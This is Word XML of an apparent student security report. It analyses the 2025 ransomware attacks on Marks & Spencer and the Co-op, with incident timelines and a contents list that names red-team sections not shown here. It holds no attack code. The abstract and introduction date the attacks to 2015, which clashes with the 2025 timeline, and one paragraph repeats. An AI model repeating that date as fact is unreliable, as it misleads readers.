          <w:p w14:paraId="51AD2E46" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC10EA">
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7624" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7BD5137C" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:r w:rsidRPr="00CC10EA">
              <w:t>Rules of Engagement (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CC10EA">
              <w:t>RoE</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CC10EA">
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1231" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38597701" w14:textId="567D5E90" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w14:paraId="2DA0680B" w14:textId="77777777" w:rsidTr="00CC10EA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="715446A5" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC10EA">
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7624" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4927248C" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:r w:rsidRPr="00CC10EA">
              <w:t>Threat Emulation Plan &amp; MITRE ATT&amp;CK Mapping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1231" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DB1EB64" w14:textId="5EEEAC72" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>21</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w14:paraId="339D9F93" w14:textId="77777777" w:rsidTr="00CC10EA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DC44CA1" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC10EA">
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7624" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EBCA622" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:r w:rsidRPr="00CC10EA">
              <w:t>Laboratory Environment Design</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1231" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="563E6B0C" w14:textId="33AD2B32" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>22</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w14:paraId="498DB439" w14:textId="77777777" w:rsidTr="00CC10EA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40FF99AD" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC10EA">
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7624" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28B7626F" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:r w:rsidRPr="00CC10EA">
              <w:t>Exploitation Campaign Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1231" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E47F4F9" w14:textId="196342EE" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>23</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w14:paraId="47F58A56" w14:textId="77777777" w:rsidTr="00CC10EA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C47B849" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC10EA">
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7624" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4675B098" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:r w:rsidRPr="00CC10EA">
              <w:t>Detection Gap Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1231" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2C049C86" w14:textId="4E160780" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>32</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w14:paraId="246D4094" w14:textId="77777777" w:rsidTr="00CC10EA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31C8CDEC" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC10EA">
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7624" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F90B7EA" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:r w:rsidRPr="00CC10EA">
              <w:t>Operational Security and Containment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1231" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DEC7C66" w14:textId="05F55928" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>33</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w14:paraId="320895F1" w14:textId="77777777" w:rsidTr="00CC10EA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E533A6C" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC10EA">
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7624" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29F4EDBE" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:r w:rsidRPr="00CC10EA">
              <w:t>Conclusion (Task 2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1231" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="345167D1" w14:textId="6D9EB4C7" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>34</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w14:paraId="3F96FFA8" w14:textId="77777777" w:rsidTr="00CC10EA">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="948" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E6D104D" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00CC10EA">
              <w:t>19</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7624" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="091713F9" w14:textId="77777777" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:r w:rsidRPr="00CC10EA">
              <w:t>References</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1231" w:type="dxa"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5565DB32" w14:textId="5A235CDF" w:rsidR="00CC10EA" w:rsidRPr="00CC10EA" w:rsidRDefault="00CC10EA" w:rsidP="00CC10EA">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>35</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="215C066D" w14:textId="6BBD495C" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04"/>
    <w:p w14:paraId="6B224172" w14:textId="3933B927" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="00115C04">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="106C2289" w14:textId="77777777" w:rsidR="00053404" w:rsidRDefault="00053404" w:rsidP="00053404"/>
    <w:p w14:paraId="0DB225BB" w14:textId="77777777" w:rsidR="00053404" w:rsidRDefault="00053404" w:rsidP="00053404"/>
    <w:p w14:paraId="6579B0B8" w14:textId="77777777" w:rsidR="00053404" w:rsidRDefault="00053404" w:rsidP="00053404"/>
    <w:p w14:paraId="509AE63B" w14:textId="77777777" w:rsidR="00053404" w:rsidRDefault="00053404" w:rsidP="00053404"/>
    <w:p w14:paraId="6B407FDD" w14:textId="77777777" w:rsidR="00053404" w:rsidRDefault="00053404" w:rsidP="00053404"/>
    <w:p w14:paraId="0049BCC4" w14:textId="77777777" w:rsidR="00053404" w:rsidRDefault="00053404" w:rsidP="00053404"/>
    <w:p w14:paraId="246D5AAA" w14:textId="77777777" w:rsidR="00053404" w:rsidRDefault="00053404" w:rsidP="00053404"/>
    <w:p w14:paraId="20A1B36F" w14:textId="77777777" w:rsidR="00053404" w:rsidRDefault="00053404" w:rsidP="00053404"/>
    <w:p w14:paraId="5DBEA86F" w14:textId="77777777" w:rsidR="00053404" w:rsidRDefault="00053404" w:rsidP="00053404"/>
    <w:p w14:paraId="0D60691A" w14:textId="77777777" w:rsidR="00053404" w:rsidRDefault="00053404" w:rsidP="00053404"/>
    <w:p w14:paraId="4666E3A2" w14:textId="76509B3D" w:rsidR="00053404" w:rsidRPr="00053404" w:rsidRDefault="00053404" w:rsidP="00053404">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00053404">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Task 1 - A Critical Analysis of the 2025 Ransomware Campaign Against Marks &amp; Spencer and The Co-operative Group </w:t>
      </w:r>
      <w:r w:rsidRPr="00053404">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="181196B1" w14:textId="4E2A435B" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00115C04">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Abstract</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DCE2E7" w14:textId="5C6A5018" w:rsidR="00115C04" w:rsidRDefault="00E32A84" w:rsidP="00115C04">
      <w:r w:rsidRPr="00E32A84">
        <w:t xml:space="preserve">In April 2015, both Marks &amp; Spencer (M&amp;S) and The Co-Operative Group experienced cybersecurity breaches. These include various types of cyberattacks, including </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E32A84">
        <w:t>unauthorised</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E32A84">
        <w:t xml:space="preserve"> access and advanced social engineering to facilitate credential exfiltration of stolen or exfiltrated data during the first phase of attacks and then encrypted by ransomware. The attacks were especially damaging during the Easter period, when both companies were heavily dependent on their IT infrastructure - for M&amp;S, e-commerce and logistics. Sources suggest Scattered Spider and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E32A84">
        <w:t>DragonForce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E32A84">
        <w:t xml:space="preserve"> ransomware-as-a-service are likely responsible for M&amp;S's security issues.</w:t>
      </w:r>
      <w:r w:rsidR="00115C04">
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CF2103" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CF98577" w14:textId="00603B49" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00115C04">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B82265C" w14:textId="4035F928" w:rsidR="00115C04" w:rsidRDefault="00E32A84" w:rsidP="00115C04">
      <w:r w:rsidRPr="00E32A84">
        <w:t>In April 2015, two major UK retailers, the Co-operative Group and Marks &amp; Spencer, were the victims of serious cyberattacks. This attack was a combination of ransomware, credential theft and social engineering. They are a great example of how contemporary threat actors, such as Scattered Spider, avoid the "narrow path" of technical exploits, and focus on human and identity vulnerabilities such as Active Directory and helpdesks. They started early, remained hidden for several months and then employed ran-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E32A84">
        <w:t>somware</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E32A84">
        <w:t xml:space="preserve"> for maximum effect. The Irish Internet Security Forum (IISF) technical briefing and </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E32A84">
        <w:t>SpecOps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E32A84">
        <w:t xml:space="preserve"> Software analysis of this attack are, in my view, the best and most accessible, and are therefore ideal for this purpose.</w:t>
      </w:r>
      <w:r w:rsidRPr="00E32A84">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00115C04">
        <w:t>[1,2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B066247" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04"/>
    <w:p w14:paraId="0EF502E1" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04" w:rsidP="00115C04">
      <w:r>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B9D27E" w14:textId="77777777" w:rsidR="00115C04" w:rsidRDefault="00115C04">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="687C3758" w14:textId="1C0C88BD"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1 Incident Summary and Timeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4540C9F4" w14:textId="77777777" w:rsidR="00E32A84" w:rsidRDefault="00E32A84" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E32A84">
        <w:t xml:space="preserve">This is a detailed breakdown of the official statements from the company, the IISF advice, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E32A84">
        <w:t>SpecOps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E32A84">
        <w:t xml:space="preserve"> analysis, ICO and NCA of M&amp;S's Co-op.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1908CEAA" w14:textId="77777777" w:rsidR="00E32A84" w:rsidRDefault="00E32A84" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E32A84">
        <w:t xml:space="preserve">This was missed for approximately two months. [1, 2] </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534FF59D" w14:textId="3D8E5968" w:rsidR="00E32A84" w:rsidRDefault="00E32A84" w:rsidP="00115C04">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00E32A84">
        <w:t>In the Easter weekend of April 19-21 2025, customers started to notice problems with M&amp;S. Orders took a long time to process online, Click &amp; Collect stopped working efficiently, contactless payments were disrupted and warehouse operations were disrupted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFA88AB" w14:textId="77777777" w:rsidR="00F51FC7" w:rsidRDefault="00F51FC7" w:rsidP="00F51FC7">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Easter weekend, April 19-21, 2025: Customers started to experience problems with M&amp;S online orders were delayed, Click &amp; Collect stopped working, contactless payments were disrupted and its warehouse operations were disrupted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3959C20B" w14:textId="77777777" w:rsidR="00F51FC7" w:rsidRDefault="00F51FC7" w:rsidP="00F51FC7">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>22 April 2025: M&amp;S assured the public that its stores remained open while officially acknowledging a "cyber incident" in its stock-market announcement [3].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4375E322" w14:textId="77777777" w:rsidR="00F51FC7" w:rsidRDefault="00F51FC7" w:rsidP="00F51FC7">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>23 April 2025: M&amp;S released a follow-up statement assuring customers that it would continue to keep them updated about the changes to its operations to enhance system security [3].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C975F9A" w14:textId="77777777" w:rsidR="00F51FC7" w:rsidRDefault="00F51FC7" w:rsidP="00F51FC7">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DragonForce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ransomware was unleashed in April, 2025. It enciphered critical virtual machines and attacked the VMware </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ESXi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> hypervisor [1].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088B77AF" w14:textId="77777777" w:rsidR="00F51FC7" w:rsidRDefault="00F51FC7" w:rsidP="00F51FC7">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>In its efforts to manage the incident, M&amp;S temporarily closed its online orders on April 25, 2025. [4].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C10F738" w14:textId="77777777" w:rsidR="00F51FC7" w:rsidRDefault="00F51FC7" w:rsidP="00F51FC7">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>On May 2, 2025, the Information Commissioner's Office (ICO) stated it was working with the NCSC and had complaints of breaches from the two companies [5].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E8E63A" w14:textId="77777777" w:rsidR="00F51FC7" w:rsidRDefault="00F51FC7" w:rsidP="00F51FC7">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>May - June 2025: M&amp;S confirmed that some personal information of their clients had been stolen, such as contact details, date of birth and purchase history, but no usable card or payment data. M&amp;S began to notify the affected clients and members. [6].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED51276" w14:textId="77777777" w:rsidR="00F51FC7" w:rsidRDefault="00F51FC7" w:rsidP="00F51FC7">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>July 2025: National Crime Agency (NCA) arrested four people between the ages of 17 to 20 for the attacks on M&amp;S, Co-op, and Harrods [7].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2434CEB7" w14:textId="77777777" w:rsidR="00F51FC7" w:rsidRDefault="00F51FC7" w:rsidP="00F51FC7">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Later in 2025 (Annual Report), M&amp;S reported that they expected a profit impact of over £300 million for 2025-2026. M&amp;S needed to rebuild their entire network [8].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF2A6C3" w14:textId="77777777" w:rsidR="00F51FC7" w:rsidRDefault="00F51FC7" w:rsidP="00F51FC7">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C3CDD24" w14:textId="18EB0A31" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="00115C04" w:rsidP="00F51FC7">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="00115C04">
        <w:t>Co-op Incident Timeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBA291B" w14:textId="77777777" w:rsidR="00F51FC7" w:rsidRDefault="00F51FC7" w:rsidP="00F51FC7">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>22-27 April 2025: Hackers continued to try and use the same social engineering techniques, such as impersonating colleagues and answering security questions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C7D6A3" w14:textId="77777777" w:rsidR="00F51FC7" w:rsidRDefault="00F51FC7" w:rsidP="00F51FC7">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>30 April 2025: Co-op proactively shut down some call and back office systems, and publicly acknowledged the attack [9].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3481FF5C" w14:textId="77777777" w:rsidR="00F51FC7" w:rsidRDefault="00F51FC7" w:rsidP="00F51FC7">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>2 May 2025: The company confirmed that the data of many current and former members were compromised [10].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099E76CF" w14:textId="7A2E4595" w:rsidR="00115C04" w:rsidRPr="00115C04" w:rsidRDefault="00F51FC7" w:rsidP="00F51FC7">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>May - September 2025: There were empty shelves in stores due to supply chain issues. Almost 6.5 million of the business's subscribers were ultimately impacted by the hack, with an estimated loss of £206 million in sales [11, 12].</w:t>
      </w:r>
      <w:r w:rsidR="00115C04" w:rsidRPr="00115C04">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
